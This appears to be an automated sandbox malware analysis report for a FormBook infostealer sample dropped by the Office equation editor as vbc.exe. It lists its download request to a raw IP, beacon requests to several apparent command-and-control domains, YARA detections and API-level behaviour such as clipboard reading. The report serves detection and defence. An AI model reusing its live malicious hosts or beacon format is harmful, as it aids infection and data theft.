Source: global traffic	HTTP traffic detected: GET /winos11pro/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=m45wz0yJH0eU0AdWNIhpnj7O98T4qieiIfcSO4QQLTkRI2A85Oo6eqE9guaDClHK+tDn+A== HTTP/1.1Host: www.chiplorain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?5jMx_fYX=/0p52NrLw6/lfqJ/6i2KRqaclY9EGZAkl3iVYOjyKH0fSpE9MHsWsCd4MfgGNBa7PLwApw==&DD=h0Dd6TfP HTTP/1.1Host: www.searakloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=45pLxo9kavwG0b6/ageG5KZoyEg3RdGQG9PSgAgmCz2Hqkg+0QkW1XX316CwBWlYmM0BuA== HTTP/1.1Host: www.lauraimoveis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?5jMx_fYX=NJ8vjIFYwVF+K1Zn/AGorNaFwyaz0G/XgrC+2klBX/IapeezUPO8bi3RGsgrxJXS1LqH5g==&DD=h0Dd6TfP HTTP/1.1Host: www.atlantahousingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=Dtwu72sJ/YpTMebBbpFICpD7OPufwyJSP0x6RFU6mEZA3uDfPjbVMUZhI3MTljxZrpV9GA== HTTP/1.1Host: www.louisesshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?5jMx_fYX=LW5horzSF3uc1GWuNtjePQyf7tqmMuH+apCXxYGRs9OB+DuQ+Cegeibn8pPPEnsybp118Q==&DD=h0Dd6TfP HTTP/1.1Host: www.heigray.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00404F61

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_00403225

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040604C		4_2_0040604C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404772		4_2_00404772
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C062		5_2_0041C062
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B92A		5_2_0041B92A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C2B0		5_2_0041C2B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CB69		5_2_0041CB69
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C7B		5_2_00408C7B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BCFD		5_2_0041BCFD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C80		5_2_00408C80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D88		5_2_00402D88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CF88		5_2_0041CF88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075905A		5_2_0075905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00743040		5_2_00743040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076D005		5_2_0076D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0073E0C6		5_2_0073E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E1238		5_2_007E1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0073E2E9		5_2_0073E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078A37B		5_2_0078A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00747353		5_2_00747353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00742305		5_2_00742305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007663DB		5_2_007663DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0073F3CF		5_2_0073F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E63BF		5_2_007E63BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077D47D		5_2_0077D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C443E		5_2_007C443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00775485		5_2_00775485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751489		5_2_00751489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00786540		5_2_00786540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074351F		5_2_0074351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075C5F0		5_2_0075C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078A634		5_2_0078A634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E2622		5_2_007E2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074E6C1		5_2_0074E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00744680		5_2_00744680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007757C3		5_2_007757C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074C7BC		5_2_0074C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C579A		5_2_007C579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076286D		5_2_0076286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074C85C		5_2_0074C85C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CB210		7_2_4A3CB210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3D12D2		7_2_4A3D12D2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CE46C		7_2_4A3CE46C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3D39B6		7_2_4A3D39B6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02491238		7_2_02491238
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023EE2E9		7_2_023EE2E9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0243A37B		7_2_0243A37B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023F2305		7_2_023F2305
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023F7353		7_2_023F7353
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_024163DB		7_2_024163DB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023EF3CF		7_2_023EF3CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_024963BF		7_2_024963BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0240905A		7_2_0240905A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0241D005		7_2_0241D005
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023F3040		7_2_023F3040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023EE0C6		7_2_023EE0C6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02492622		7_2_02492622
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0243A634		7_2_0243A634
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023F4680		7_2_023F4680
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023FE6C1		7_2_023FE6C1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_024257C3		7_2_024257C3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023FC7BC		7_2_023FC7BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0247579A		7_2_0247579A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0242D47D		7_2_0242D47D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02425485		7_2_02425485
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02401489		7_2_02401489
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02436540		7_2_02436540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023F351F		7_2_023F351F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0240C5F0		7_2_0240C5F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_024A3A83		7_2_024A3A83
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02417B00		7_2_02417B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0247DBDA		7_2_0247DBDA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023EFBD7		7_2_023EFBD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0249CBA4		7_2_0249CBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0241286D		7_2_0241286D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023FC85C		7_2_023FC85C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0248F8EE		7_2_0248F8EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02475955		7_2_02475955

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 007AF970 appears 42 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00783F92 appears 70 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0078373B appears 117 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0073DF5C appears 66 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0243373B appears 162 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 023EDF5C appears 90 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 02433F92 appears 82 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0245F970 appears 65 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185E0 NtCreateFile,		5_2_004185E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418690 NtReadFile,		5_2_00418690
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418710 NtClose,		5_2_00418710
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004187C0 NtAllocateVirtualMemory,		5_2_004187C0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185DB NtCreateFile,		5_2_004185DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418632 NtCreateFile,		5_2_00418632
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041870B NtClose,		5_2_0041870B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004187BF NtAllocateVirtualMemory,		5_2_004187BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,		5_2_00730078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00730048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,		5_2_007300C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,		5_2_007307AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,		5_2_0072F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,		5_2_0072F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_0072FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_0072FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_0072FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_0072FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_0072FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_0072FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_0072FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,		5_2_0072FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_0072FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_0072FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,		5_2_0072FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00730060 NtQuerySection,		5_2_00730060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007310D0 NtOpenProcessToken,		5_2_007310D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00731148 NtOpenThread,		5_2_00731148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0073010C NtOpenDirectoryObject,		5_2_0073010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007301D4 NtSetValueKey,		5_2_007301D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3E1E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,		7_2_4A3E1E5F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CC2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,		7_2_4A3CC2A6
